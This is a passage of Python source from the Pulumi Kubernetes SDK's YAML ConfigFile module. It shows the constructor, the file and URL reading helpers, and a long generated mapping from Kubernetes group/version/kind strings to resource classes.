except KeyError:
pass
# Set a resource alias for a previous name.
def alias(obj, opts):
if obj["kind"] == "Deployment":
opts.aliases = ["oldName"]
# Omit a resource from the Chart by transforming the specified resource definition to an empty List.
def omit_resource(obj, opts):
if obj["kind"] == "Pod" and obj["metadata"]["name"] == "test":
obj["apiVersion"] = "v1"
obj["kind"] = "List"
example = ConfigFile(
"example",
file="foo.yaml",
transformations=[make_service_private, alias, omit_resource],
)
```
:param str name: A name for a resource.
:param Optional[str] file: Path or a URL that uniquely identifies a file.
:param Optional[pulumi.ResourceOptions] opts: A bag of optional settings that control a resource's behavior.
:param Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] transformations: A set of
transformations to apply to Kubernetes resource definitions before registering with engine.
:param Optional[str] resource_prefix: An optional prefix for the auto-generated resource names.
Example: A resource created with resource_prefix="foo" would produce a resource named "foo-resourceName".
:param Optional[bool] skip_await: Skip await logic for all resources in this YAML. Resources will be marked
ready as soon as they are created. Warning: This option should not be used if you have resources
depending on Outputs from the YAML.
"""
if not name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if resource_prefix:
name = f"{resource_prefix}-{name}"
super(ConfigFile, self).__init__(
"kubernetes:yaml:ConfigFile",
name,
__props__,
opts)
if file_id is not None:
warnings.warn("explicit use of file_id is deprecated, use 'file' instead", DeprecationWarning)
file = file_id
if file is None:
raise TypeError("Missing file argument")
if _is_url(file):
text = _read_url(file)
else:
text = _read_file(file)
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(parent=self))
transformations = transformations if transformations is not None else []
if skip_await:
transformations.append(_skip_await)
# Rather than using the default provider for the following invoke call, use the version specified
# in package.json.
invoke_opts = pulumi.InvokeOptions(version=_utilities.get_version(),
provider=opts.provider if opts.provider else None)
__ret__ = invoke_yaml_decode(text, invoke_opts)
# Note: Unlike NodeJS, Python requires that we "pull" on our futures in order to get them scheduled for
# execution. In order to do this, we leverage the engine's RegisterResourceOutputs to wait for the
# resolution of all resources that this YAML document created.
self.resources = _parse_yaml_document(__ret__, opts, transformations, resource_prefix)
self.register_outputs({"resources": self.resources})
def translate_output_property(self, prop: str) -> str:
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
def get_resource(self,
group_version_kind: str,
name: str,
namespace: Optional[str] = None) -> pulumi.Output[pulumi.CustomResource]:
"""
get_resource returns a resource defined by a built-in Kubernetes group/version/kind and
name. For example: `get_resource("apps/v1/Deployment", "nginx")`
:param str group_version_kind: Group/Version/Kind of the resource, e.g., `apps/v1/Deployment`
:param str name: Name of the resource to retrieve
:param Optional[str] namespace: Optional namespace of the resource to retrieve
"""
# `id` will either be `${name}` or `${namespace}/${name}`.
id = pulumi.Output.from_input(name)
if namespace is not None:
id = pulumi.Output.concat(namespace, '/', name)
resource_id = id.apply(lambda x: f'{group_version_kind}:{x}')
return resource_id.apply(lambda x: self.resources[x])
# Add skipAwait annotation to all resources.
def _skip_await(obj, opts):
if obj["metadata"].get("annotations") is None:
obj["metadata"]["annotations"] = {"pulumi.com/skipAwait": "true"}
else:
obj["metadata"]["annotations"]["pulumi.com/skipAwait"] = "true"
def _is_url(url: str) -> bool:
return url.startswith('http://') or url.startswith('https://')
def _read_url(url: str) -> str:
response = requests.get(url)
response.raise_for_status()
return response.text
def _read_file(path: str) -> str:
with open(path, 'r') as file:
data = file.read()
return data
def _build_resources_dict(objs: Sequence[pulumi.Output]) -> Mapping[pulumi.Output, pulumi.Output]:
return {key: value for key, value in objs}
def _parse_yaml_document(
objects, opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable]] = None,
resource_prefix: Optional[str] = None
) -> pulumi.Output:
objs = []
for obj in objects:
file_objects = _parse_yaml_object(obj, opts, transformations, resource_prefix)
for file_object in file_objects:
objs.append(file_object)
return pulumi.Output.all(*objs).apply(_build_resources_dict)
def _parse_yaml_object(
obj, opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable]] = None,
resource_prefix: Optional[str] = None
) -> List[pulumi.Output]:
"""
_parse_yaml_object parses a YAML manifest object, and creates the specified resources.
"""
if not obj:
return []
# Create a copy of opts to pass into potentially mutating transforms that will be applied to this resource.
if opts is not None:
opts = copy(opts)
else:
opts = {}
# Allow users to change API objects before any validation.
if transformations is not None:
for t in transformations:
if len(getfullargspec(t)[0]) == (2 if not ismethod(t) else 3):
t(obj, opts)
else:
t(obj)
if "kind" not in obj or "apiVersion" not in obj:
raise Exception("Kubernetes resources require a kind and apiVersion: {}".format(json.dumps(obj)))
api_version = obj["apiVersion"]
kind = obj["kind"]
# Don't pass these items as kwargs to the resource classes.
del obj['apiVersion']
del obj['kind']
if kind.endswith("List"):
objs = []
if "items" in obj:
for item in obj["items"]:
objs += _parse_yaml_object(item, opts, transformations, resource_prefix)
return objs
if "metadata" not in obj or "name" not in obj["metadata"]:
raise Exception("YAML object does not have a .metadata.name: {}/{} {}".format(
api_version, kind, json.dumps(obj)))
# Convert obj keys to Python casing
for key in list(obj.keys()):
new_key = _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(key) or key
if new_key != key:
obj[new_key] = obj.pop(key)
metadata = obj["metadata"]
spec = obj.get("spec")
identifier: pulumi.Output = pulumi.Output.from_input(metadata["name"])
if "namespace" in metadata:
identifier = pulumi.Output.all(metadata["namespace"], metadata["name"]).apply(
lambda x: f"{x[0]}/{x[1]}")
if resource_prefix:
identifier = pulumi.Output.from_input(identifier).apply(
lambda identifier: f"{resource_prefix}-{identifier}")
gvk = f"{api_version}/{kind}"
if gvk == "admissionregistration.k8s.io/v1/MutatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import MutatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/MutatingWebhookConfiguration:{x}",
MutatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1/MutatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import MutatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/MutatingWebhookConfigurationList:{x}",
MutatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1/ValidatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import ValidatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/ValidatingWebhookConfiguration:{x}",
ValidatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1/ValidatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import ValidatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/ValidatingWebhookConfigurationList:{x}",
ValidatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicy
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicy:{x}",
ValidatingAdmissionPolicy(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicyBinding
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBinding:{x}",
ValidatingAdmissionPolicyBinding(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicyBindingList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBindingList:{x}",
ValidatingAdmissionPolicyBindingList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicyList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyList:{x}",
ValidatingAdmissionPolicyList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/MutatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import MutatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/MutatingWebhookConfiguration:{x}",
MutatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/MutatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import MutatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/MutatingWebhookConfigurationList:{x}",
MutatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicy
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicy:{x}",
ValidatingAdmissionPolicy(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicyBinding
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBinding:{x}",
ValidatingAdmissionPolicyBinding(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicyBindingList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBindingList:{x}",
ValidatingAdmissionPolicyBindingList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicyList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyList:{x}",
ValidatingAdmissionPolicyList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfiguration:{x}",
ValidatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfigurationList:{x}",
ValidatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1/CustomResourceDefinitionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1 import CustomResourceDefinitionList
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1/CustomResourceDefinitionList:{x}",
CustomResourceDefinitionList(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1beta1/CustomResourceDefinitionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1beta1 import CustomResourceDefinitionList
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1beta1/CustomResourceDefinitionList:{x}",
CustomResourceDefinitionList(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1/APIService":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1 import APIService
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1/APIService:{x}",
APIService(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1/APIServiceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1 import APIServiceList
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1/APIServiceList:{x}",
APIServiceList(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1beta1/APIService":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1beta1 import APIService
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1beta1/APIService:{x}",
APIService(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1beta1/APIServiceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1beta1 import APIServiceList
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1beta1/APIServiceList:{x}",
APIServiceList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ControllerRevision":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ControllerRevision
return [identifier.apply(
lambda x: (f"apps/v1/ControllerRevision:{x}",
ControllerRevision(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ControllerRevisionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ControllerRevisionList
return [identifier.apply(
lambda x: (f"apps/v1/ControllerRevisionList:{x}",
ControllerRevisionList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/DaemonSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import DaemonSet
return [identifier.apply(
lambda x: (f"apps/v1/DaemonSet:{x}",
DaemonSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1/DaemonSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import DaemonSetList
return [identifier.apply(
lambda x: (f"apps/v1/DaemonSetList:{x}",
DaemonSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import Deployment
return [identifier.apply(
lambda x: (f"apps/v1/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "apps/v1/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import DeploymentList
return [identifier.apply(
lambda x: (f"apps/v1/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ReplicaSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ReplicaSet
return [identifier.apply(
lambda x: (f"apps/v1/ReplicaSet:{x}",
ReplicaSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ReplicaSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ReplicaSetList
return [identifier.apply(
lambda x: (f"apps/v1/ReplicaSetList:{x}",
ReplicaSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/StatefulSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import StatefulSet
return [identifier.apply(
lambda x: (f"apps/v1/StatefulSet:{x}",
StatefulSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1/StatefulSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import StatefulSetList
return [identifier.apply(
lambda x: (f"apps/v1/StatefulSetList:{x}",
StatefulSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/ControllerRevision":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import ControllerRevision
return [identifier.apply(
lambda x: (f"apps/v1beta1/ControllerRevision:{x}",
ControllerRevision(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/ControllerRevisionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import ControllerRevisionList
return [identifier.apply(
lambda x: (f"apps/v1beta1/ControllerRevisionList:{x}",
ControllerRevisionList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import Deployment
return [identifier.apply(
lambda x: (f"apps/v1beta1/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import DeploymentList
return [identifier.apply(
lambda x: (f"apps/v1beta1/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/StatefulSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import StatefulSet
return [identifier.apply(
lambda x: (f"apps/v1beta1/StatefulSet:{x}",
StatefulSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/StatefulSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import StatefulSetList
return [identifier.apply(
lambda x: (f"apps/v1beta1/StatefulSetList:{x}",
StatefulSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ControllerRevision":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ControllerRevision
return [identifier.apply(
lambda x: (f"apps/v1beta2/ControllerRevision:{x}",
ControllerRevision(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ControllerRevisionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ControllerRevisionList
return [identifier.apply(
lambda x: (f"apps/v1beta2/ControllerRevisionList:{x}",
ControllerRevisionList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/DaemonSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import DaemonSet
return [identifier.apply(
lambda x: (f"apps/v1beta2/DaemonSet:{x}",
DaemonSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/DaemonSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import DaemonSetList
return [identifier.apply(
lambda x: (f"apps/v1beta2/DaemonSetList:{x}",
DaemonSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import Deployment
return [identifier.apply(
lambda x: (f"apps/v1beta2/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import DeploymentList
return [identifier.apply(
lambda x: (f"apps/v1beta2/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ReplicaSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ReplicaSet
return [identifier.apply(
lambda x: (f"apps/v1beta2/ReplicaSet:{x}",
ReplicaSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ReplicaSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ReplicaSetList
return [identifier.apply(
lambda x: (f"apps/v1beta2/ReplicaSetList:{x}",
ReplicaSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/StatefulSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import StatefulSet
return [identifier.apply(
lambda x: (f"apps/v1beta2/StatefulSet:{x}",
StatefulSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/StatefulSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import StatefulSetList
return [identifier.apply(
lambda x: (f"apps/v1beta2/StatefulSetList:{x}",
StatefulSetList(f"{x}", opts, **obj)))]
if gvk == "auditregistration.k8s.io/v1alpha1/AuditSink":
# Import locally to avoid name collisions.
from pulumi_kubernetes.auditregistration.v1alpha1 import AuditSink
return [identifier.apply(
lambda x: (f"auditregistration.k8s.io/v1alpha1/AuditSink:{x}",
AuditSink(f"{x}", opts, **obj)))]
if gvk == "auditregistration.k8s.io/v1alpha1/AuditSinkList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.auditregistration.v1alpha1 import AuditSinkList
return [identifier.apply(
lambda x: (f"auditregistration.k8s.io/v1alpha1/AuditSinkList:{x}",
AuditSinkList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v1/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v1 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v1/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v1/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v1 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v1/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v2/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v2/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta1/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta1 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v2beta1/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta1/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta1 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v2beta1/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta2/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta2 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v2beta2/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta2/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta2 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v2beta2/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "batch/v1/CronJob":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import CronJob
return [identifier.apply(
lambda x: (f"batch/v1/CronJob:{x}",
CronJob(f"{x}", opts, **obj)))]
if gvk == "batch/v1/CronJobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import CronJobList
return [identifier.apply(
lambda x: (f"batch/v1/CronJobList:{x}",
CronJobList(f"{x}", opts, **obj)))]
if gvk == "batch/v1/Job":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import Job
return [identifier.apply(
lambda x: (f"batch/v1/Job:{x}",
Job(f"{x}", opts, **obj)))]
if gvk == "batch/v1/JobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import JobList
return [identifier.apply(
lambda x: (f"batch/v1/JobList:{x}",
JobList(f"{x}", opts, **obj)))]
if gvk == "batch/v1beta1/CronJob":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1beta1 import CronJob
return [identifier.apply(
lambda x: (f"batch/v1beta1/CronJob:{x}",
CronJob(f"{x}", opts, **obj)))]
if gvk == "batch/v1beta1/CronJobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1beta1 import CronJobList
return [identifier.apply(
lambda x: (f"batch/v1beta1/CronJobList:{x}",
CronJobList(f"{x}", opts, **obj)))]
if gvk == "batch/v2alpha1/CronJob":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v2alpha1 import CronJob
return [identifier.apply(
lambda x: (f"batch/v2alpha1/CronJob:{x}",
CronJob(f"{x}", opts, **obj)))]
if gvk == "batch/v2alpha1/CronJobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v2alpha1 import CronJobList
return [identifier.apply(
lambda x: (f"batch/v2alpha1/CronJobList:{x}",
CronJobList(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1/CertificateSigningRequest":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1 import CertificateSigningRequest
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1/CertificateSigningRequest:{x}",
CertificateSigningRequest(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1/CertificateSigningRequestList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1 import CertificateSigningRequestList
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1/CertificateSigningRequestList:{x}",
CertificateSigningRequestList(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1alpha1/ClusterTrustBundle":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1alpha1 import ClusterTrustBundle
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1alpha1/ClusterTrustBundle:{x}",
ClusterTrustBundle(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1alpha1/ClusterTrustBundleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1alpha1 import ClusterTrustBundleList
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1alpha1/ClusterTrustBundleList:{x}",
ClusterTrustBundleList(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1beta1/CertificateSigningRequest":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1beta1 import CertificateSigningRequest
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1beta1/CertificateSigningRequest:{x}",
CertificateSigningRequest(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1beta1/CertificateSigningRequestList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1beta1 import CertificateSigningRequestList
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1beta1/CertificateSigningRequestList:{x}",
CertificateSigningRequestList(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1/Lease":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1 import Lease
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1/Lease:{x}",
Lease(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1/LeaseList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1 import LeaseList
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1/LeaseList:{x}",
LeaseList(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1beta1/Lease":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1beta1 import Lease
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1beta1/Lease:{x}",
Lease(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1beta1/LeaseList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1beta1 import LeaseList
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1beta1/LeaseList:{x}",
LeaseList(f"{x}", opts, **obj)))]
if gvk == "v1/Binding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Binding
return [identifier.apply(
lambda x: (f"v1/Binding:{x}",
Binding(f"{x}", opts, **obj)))]
if gvk == "v1/ConfigMap":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ConfigMap
return [identifier.apply(
lambda x: (f"v1/ConfigMap:{x}",
ConfigMap(f"{x}", opts, **obj)))]
if gvk == "v1/ConfigMapList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ConfigMapList
return [identifier.apply(
lambda x: (f"v1/ConfigMapList:{x}",
ConfigMapList(f"{x}", opts, **obj)))]
if gvk == "v1/Endpoints":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Endpoints
return [identifier.apply(
lambda x: (f"v1/Endpoints:{x}",
Endpoints(f"{x}", opts, **obj)))]
if gvk == "v1/EndpointsList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import EndpointsList
return [identifier.apply(
lambda x: (f"v1/EndpointsList:{x}",
EndpointsList(f"{x}", opts, **obj)))]
if gvk == "v1/Event":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Event
return [identifier.apply(
lambda x: (f"v1/Event:{x}",
Event(f"{x}", opts, **obj)))]
if gvk == "v1/EventList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import EventList
return [identifier.apply(
lambda x: (f"v1/EventList:{x}",
EventList(f"{x}", opts, **obj)))]
if gvk == "v1/LimitRange":
# Import locally to avoid name collisions.
